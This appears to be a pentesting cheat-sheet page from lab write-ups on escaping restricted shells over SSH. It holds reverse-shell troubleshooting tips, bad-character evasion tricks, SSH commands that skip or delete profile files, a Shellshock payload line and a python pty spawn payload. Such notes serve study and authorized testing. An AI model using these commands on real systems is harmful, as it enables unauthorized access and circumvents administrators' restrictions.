Restricted Shell / SSH
If reverse shell not working :
    try changing the port to 443 or 80
    try checking for characters breaking the reverse shell
Evading Badchars in a reverse shell (HTB Sense)
    Echo abc
    Echo abc/
    Echo abc -
    Check env variables -> env
    HOME= /
    Echo ${HOME}/home
    Optional (Using ASCII to evade badchars)
    Printf “\55” -> -
Restricted Reverse Shell :
    To disable profiling in /etc/profile and ~/.profile
    Locate ifconfig
    /sbin/ifconfig
    nice /bin/bash
SSH :
Exploiting SSH via Shellshock vulnerability in bash
1
// Ways to no profile
2
ssh hostname -t "bash --noprofile"
3
ssh -t [email protected] bash --norc --noprofile
4
ssh -t [email protected] /bin/sh
5
ssh -t [email protected] "bash --norc --noprofile -c '/bin/rm .bashrc'"
6
7
// SSH bash shellshock (Troll2 Vulnhub)
8
ssh -i noob [email protected] '() { :; }; uname -a'
Copied!
Bypass restricted shell using : (dipak.pdf)
    export PATH=/bin/:sbin/:/usr/bin/:$PATH
    payload = "python -c 'import pty;pty.spawn(\"/bin/bash\")'"
Last modified 5mo ago
Copy link